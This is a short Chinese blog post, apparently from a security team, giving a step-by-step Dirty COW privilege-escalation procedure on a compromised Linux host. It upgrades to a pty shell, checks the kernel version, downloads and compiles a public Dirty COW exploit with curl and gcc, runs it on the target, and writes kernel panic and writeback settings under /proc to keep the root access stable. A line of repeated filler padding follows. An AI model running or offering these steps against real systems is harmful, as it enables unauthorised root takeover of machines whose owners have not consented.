基本概述
有时候我们在使用脏牛提权后会出现权限不稳定容易掉的情况,本篇文章主要提供一种解决方法
操作流程
获取shell之后为了便于操作我们这里更改交互式shell为pty类型:
python3 -c \\\"import pty;pty.spawn(\\\'/bin/bash\\\')\\\"
从上面可以看到这里并非root用户,所以我们下一步需要进行一次权限提升,之后查看内核版本——4.4.0-21-generic
uname -a
发现在影响范围内,所以之后我们使用脏牛进行提权:
curl https://raw.githubusercontent.com/sqlnetcat/dirtycow-mem/master/dirtycow-mem.c > test.c
gcc -Wall -o test test.c -ldl -lpthread
之后上传编译好的文件到目标主机:
之后执行载荷,进行权限提升:
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
echo 1 > /proc/sys/kernel/panic && echo 1 > /proc/sys/kernel/panic_on_oops && echo 1 > /proc/sys/kernel/panic_on_unrecovered_nmi && echo 1 > /proc/sys/kernel/panic_on_io_nmi && echo 1 > /proc/sys/kernel/panic_on_warn
之后就可以平稳的进行你的后续高权限操作了~
凑一下数字凑一下数字凑一下数字凑一下数字凑一下数字凑一下数字凑一下数字凑一下数字凑一下数字凑一下数字凑一下数字凑一下数字凑一下数字凑一下数字
原创文章,作者:七芒星实验室,如若转载,请注明出处:https://www.sudun.com/ask/34139.html